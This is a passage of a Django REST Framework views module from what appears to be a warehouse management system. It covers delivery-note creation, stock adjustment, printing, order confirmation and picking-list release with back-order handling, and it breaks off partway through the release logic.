from .models import DnListModel, DnDetailModel, PickingListModel
from . import serializers
from .page import MyPageNumberPaginationDNList
from utils.page import MyPageNumberPagination
from utils.datasolve import sumOfList, transportation_calculate
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.response import Response
from .filter import DnListFilter, DnDetailFilter, DnPickingListFilter
from rest_framework.exceptions import APIException
from customer.models import ListModel as customer
from warehouse.models import ListModel as warehouse
from binset.models import ListModel as binset
from goods.models import ListModel as goods
from payment.models import TransportationFeeListModel as transportation
from stock.models import StockListModel as stocklist
from stock.models import StockBinModel as stockbin
from driver.models import ListModel as driverlist
from driver.models import DispatchListModel as driverdispatch
from scanner.models import ListModel as scanner
from cyclecount.models import QTYRecorder as qtychangerecorder
from cyclecount.models import CyclecountModeDayModel as cyclecount
from django.db.models import Q
from django.db.models import Sum
from utils.md5 import Md5
import re
from .serializers import FileListRenderSerializer, FileDetailRenderSerializer
from django.http import StreamingHttpResponse
from django.utils import timezone
from .files import FileListRenderCN, FileListRenderEN, FileDetailRenderCN, FileDetailRenderEN
from rest_framework.settings import api_settings
from .serializers import SannerDnDetailGetSerializer
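# Scanner-facing DN detail view: resolves a DN by its bar_code (dn_status=3) and returns the matching detail lines.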
class SannerDnDetailView(viewsets.ModelViewSet):
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def list(self, request, *args, **kwargs):
bar_code = request.GET.get('bar_code')
DnList_obj = DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False, dn_status=3, bar_code=bar_code).first()
queryset = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=DnList_obj.dn_code, is_delete=False)
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.SannerDnDetailGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
class DnListViewSet(viewsets.ModelViewSet):
"""
retrieve:
Return a data list (get)
list:
Return a data list (all)
create:
Create a data line (post)
delete:
Delete a data line (delete)
"""
pagination_class = MyPageNumberPaginationDNList
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.DNListGetSerializer
elif self.action in ['create']:
return serializers.DNListPostSerializer
elif self.action in ['update']:
return serializers.DNListUpdateSerializer
elif self.action in ['partial_update']:
return serializers.DNListPartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
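# Create a DN header: derive the next DN code from the latest record ('DN' prefix, zero-padded sequence),
# attach an MD5 bar code, and register the code in the scanner table.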
def create(self, request, *args, **kwargs):
data = self.request.data
data['openid'] = self.request.auth.openid
if DnListModel.objects.filter(openid=data['openid'], is_delete=False).exists():
dn_last_code = DnListModel.objects.filter(openid=data['openid']).first().dn_code
dn_add_code = str(int(re.findall(r'\d+', str(dn_last_code), re.IGNORECASE)[0]) + 1).zfill(8)
data['dn_code'] = 'DN' + dn_add_code
else:
data['dn_code'] = 'DN00000001'
data['bar_code'] = Md5.md5(str(data['dn_code']))
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=data['dn_code'],
bar_code=data['bar_code'])
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
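# Soft-delete a pre-order DN (dn_status=1): mark the header and its detail lines deleted and roll back dn_stock per line.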
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 1:
qs.is_delete = True
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False)
for i in range(len(dn_detail_list)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock - int(dn_detail_list[i].goods_qty)
goods_qty_change.save()
dn_detail_list.update(is_delete=True)
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This order has Confirmed or Deliveried"})
class DnDetailViewSet(viewsets.ModelViewSet):
"""
retrieve:
Return a data list (get)
list:
Return a data list (all)
create:
Create a data line (post)
update:
Update a data line (put: update)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.DNDetailGetSerializer
elif self.action in ['create']:
return serializers.DNDetailPostSerializer
elif self.action in ['update']:
return serializers.DNDetailUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
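# Add detail lines to an existing DN: validate each goods code against the goods master, raise dn_stock,
# bulk-create the lines, then write total weight/volume/cost and transportation fee quotes back to the header.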
def create(self, request, *args, **kwargs):
data = self.request.data
if DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code']), is_delete=False).exists():
if customer.objects.filter(openid=self.request.auth.openid, customer_name=str(data['customer']), is_delete=False).exists():
for i in range(len(data['goods_code'])):
if goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][i]),
is_delete=False).exists():
check_data = {
'openid': self.request.auth.openid,
'dn_code': str(data['dn_code']),
'customer': str(data['customer']),
'goods_code': str(data['goods_code'][i]),
'goods_qty': int(data['goods_qty'][i]),
'creater': str(data['creater'])
}
serializer = self.get_serializer(data=check_data)
serializer.is_valid(raise_exception=True)
else:
raise APIException({"detail": str(data['goods_code'][i]) + " does not exists"})
post_data_list = []
weight_list = []
volume_list = []
cost_list = []
for j in range(len(data['goods_code'])):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
is_delete=False).first()
goods_weight = round(goods_detail.goods_weight * int(data['goods_qty'][j]) / 1000, 4)
goods_volume = round(goods_detail.unit_volume * int(data['goods_qty'][j]), 4)
goods_cost = round(goods_detail.goods_price * int(data['goods_qty'][j]), 2)
if stocklist.objects.filter(openid=self.request.auth.openid, goods_code=str(data['goods_code'][j]),
can_order_stock__gte=0).exists():
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j])).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock + int(data['goods_qty'][j])
goods_qty_change.save()
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
goods_desc=goods_detail.goods_desc,
dn_stock=int(data['goods_qty'][j]))
post_data = DnDetailModel(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goods_code'][j]),
goods_qty=int(data['goods_qty'][j]),
goods_weight=goods_weight,
goods_volume=goods_volume,
goods_cost=goods_cost,
creater=str(data['creater']))
weight_list.append(goods_weight)
volume_list.append(goods_volume)
cost_list.append(goods_cost)
post_data_list.append(post_data)
total_weight = sumOfList(weight_list, len(weight_list))
total_volume = sumOfList(volume_list, len(volume_list))
total_cost = sumOfList(cost_list, len(cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(data['customer']),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city, receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city, receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_list.append(transportation_detail)
transportation_res['detail'] = transportation_list
DnDetailModel.objects.bulk_create(post_data_list, batch_size=100)
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code'])).update(
customer=str(data['customer']), total_weight=total_weight, total_volume=total_volume,
total_cost=total_cost, transportation_fee=transportation_res)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "customer does not exists"})
else:
raise APIException({"detail": "DN Code does not exists"})
def update(self, request, *args, **kwargs):
data = self.request.data
if DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code']),
dn_status=1, is_delete=False).exists():
if customer.objects.filter(openid=self.request.auth.openid, customer_name=str(data['customer']),
is_delete=False).exists():
for i in range(len(data['goods_code'])):
check_data = {
'openid': self.request.auth.openid,
'dn_code': str(data['dn_code']),
'customer': str(data['customer']),
'goods_code': str(data['goods_code'][i]),
'goods_qty': int(data['goods_qty'][i]),
'creater': str(data['creater'])
}
serializer = self.get_serializer(data=check_data)
serializer.is_valid(raise_exception=True)
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']), is_delete=False)
for v in range(len(dn_detail_list)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[v].goods_code)).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock - dn_detail_list[v].goods_qty
if goods_qty_change.dn_stock < 0:
goods_qty_change.dn_stock = 0
goods_qty_change.save()
dn_detail_list[v].is_delete = True
dn_detail_list[v].save()
post_data_list = []
weight_list = []
volume_list = []
cost_list = []
for j in range(len(data['goods_code'])):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
is_delete=False).first()
goods_weight = round(goods_detail.goods_weight * int(data['goods_qty'][j]) / 1000, 4)
goods_volume = round(goods_detail.unit_volume * int(data['goods_qty'][j]), 4)
goods_cost = round(goods_detail.goods_price * int(data['goods_qty'][j]), 2)
if stocklist.objects.filter(openid=self.request.auth.openid, goods_code=str(data['goods_code'][j]),
can_order_stock__gt=0).exists():
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j])).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock + int(data['goods_qty'][j])
goods_qty_change.save()
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
goods_desc=goods_detail.goods_desc,
dn_stock=int(data['goods_qty'][j]))
post_data = DnDetailModel(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goods_code'][j]),
goods_qty=int(data['goods_qty'][j]),
goods_weight=goods_weight,
goods_volume=goods_volume,
goods_cost=goods_cost,
creater=str(data['creater']))
weight_list.append(goods_weight)
volume_list.append(goods_volume)
cost_list.append(goods_cost)
post_data_list.append(post_data)
total_weight = sumOfList(weight_list, len(weight_list))
total_volume = sumOfList(volume_list, len(volume_list))
total_cost = sumOfList(cost_list, len(cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(data['customer']),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_list.append(transportation_detail)
transportation_res['detail'] = transportation_list
DnDetailModel.objects.bulk_create(post_data_list, batch_size=100)
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code'])).update(
customer=str(data['customer']), total_weight=total_weight, total_volume=total_volume,
total_cost=total_cost, transportation_fee=transportation_res)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "Customer does not exists"})
else:
raise APIException({"detail": "DN Code has been Confirmed or does not exists"})
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 2 and qs.back_order_label:
qs.is_delete = True
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(qs.goods_code)).first()
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock - int(qs.goods_qty)
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - int(qs.goods_qty)
goods_qty_change.save()
qs.save()
if DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code, is_delete=False).exists():
pass
else:
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code).update(is_delete=True)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This order has Confirmed or Deliveried"})
class DnViewPrintViewSet(viewsets.ModelViewSet):
"""
retrieve:
Return a data list (get)
"""
serializer_class = serializers.DNListGetSerializer
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['retrieve']:
return serializers.DNDetailGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
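# Collect the data needed to print a DN: its detail lines plus customer and warehouse contact details.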
def retrieve(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot update data which not yours"})
else:
context = {}
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=qs.dn_code,
is_delete=False)
dn_detail = serializers.DNDetailGetSerializer(dn_detail_list, many=True)
customer_detail = customer.objects.filter(openid=self.request.auth.openid,
customer_name=qs.customer).first()
warehouse_detail = warehouse.objects.filter(openid=self.request.auth.openid).first()
context['dn_detail'] = dn_detail.data
context['customer_detail'] = {
"customer_name": customer_detail.customer_name,
"customer_city": customer_detail.customer_city,
"customer_address": customer_detail.customer_address,
"customer_contact": customer_detail.customer_contact
}
context['warehouse_detail'] = {
"warehouse_name": warehouse_detail.warehouse_name,
"warehouse_city": warehouse_detail.warehouse_city,
"warehouse_address": warehouse_detail.warehouse_address,
"warehouse_contact": warehouse_detail.warehouse_contact
}
return Response(context, status=200)
class DnNewOrderViewSet(viewsets.ModelViewSet):
"""
retrieve:
Return a data list (get)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListPartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
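# Confirm a pre-order DN (status 1 -> 2): move each line's quantity from can_order_stock to ordered_stock,
# creating stock list records for goods that have none yet.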
def create(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 1:
if DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False).exists():
qs.dn_status = 2
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False)
for i in range(len(dn_detail_list)):
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
goods_detail = goods.objects.filter(openid=self.request.auth.openid, goods_code=str(dn_detail_list[i].goods_code)).first()
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
goods_desc=goods_detail.goods_desc,
supplier=goods_detail.goods_supplier)
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_qty_change.can_order_stock = goods_qty_change.can_order_stock - dn_detail_list[i].goods_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock + dn_detail_list[i].goods_qty
goods_qty_change.dn_stock = goods_qty_change.dn_stock - dn_detail_list[i].goods_qty
if goods_qty_change.can_order_stock < 0:
goods_qty_change.can_order_stock = 0
goods_qty_change.save()
dn_detail_list.update(dn_status=2)
qs.save()
serializer = self.get_serializer(qs, many=False)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
else:
raise APIException({"detail": "Please Enter The DN Detail"})
else:
raise APIException({"detail": "This DN Status Is Not Pre Order"})
class DnOrderReleaseViewSet(viewsets.ModelViewSet):
"""
retrieve:
Return a data list (get)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, dn_status=2, is_delete=False).order_by('create_time')
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, dn_status=2, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create', 'update']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
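# Release all DNs in status 2: for each detail line, allocate available bin stock (in bin id order) into a
# picking list; any shortfall is split into a new back-order DN with its own DN code and bar code, and the
# released order's totals and transportation fees are recalculated before it moves to status 3.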
def create(self, request, *args, **kwargs):
qs = self.get_queryset()
for v in range(len(qs)):
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs[v].dn_code,
dn_status=2, is_delete=False)
picking_list = []
picking_list_label = 0
back_order_list = []
back_order_list_label = 0
back_order_goods_weight_list = []
back_order_goods_volume_list = []
back_order_goods_cost_list = []
back_order_base_code = DnListModel.objects.filter(openid=self.request.auth.openid,
is_delete=False).order_by('-id').first().dn_code
dn_last_code = re.findall(r'\d+', str(back_order_base_code), re.IGNORECASE)
back_order_dn_code = 'DN' + str(int(dn_last_code[0]) + 1).zfill(8)
bar_code = Md5.md5(back_order_dn_code)
total_weight = qs[v].total_weight
total_volume = qs[v].total_volume
total_cost = qs[v].total_cost
for i in range(len(dn_detail_list)):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
is_delete=False).first()
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(goods_detail.goods_code),
goods_desc=goods_detail.goods_desc,
dn_stock=int(dn_detail_list[i].goods_qty))
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_bin_stock_list = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
bin_property="Normal").order_by('id')
can_pick_qty = goods_qty_change.onhand_stock - \
goods_qty_change.inspect_stock - \
goods_qty_change.hold_stock - \
goods_qty_change.damage_stock - \
goods_qty_change.pick_stock - \
goods_qty_change.picked_stock
if can_pick_qty > 0:
if dn_detail_list[i].goods_qty > can_pick_qty:
if qs[v].back_order_label == False:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + \
dn_back_order_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
goods_qty_change.save()
dn_detail_list[i].save()
else:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].save()
elif dn_detail_list[i].goods_qty == can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - goods_bin_stock_list[
j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif dn_detail_list[i].goods_qty < can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + \
bin_can_pick_qty
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
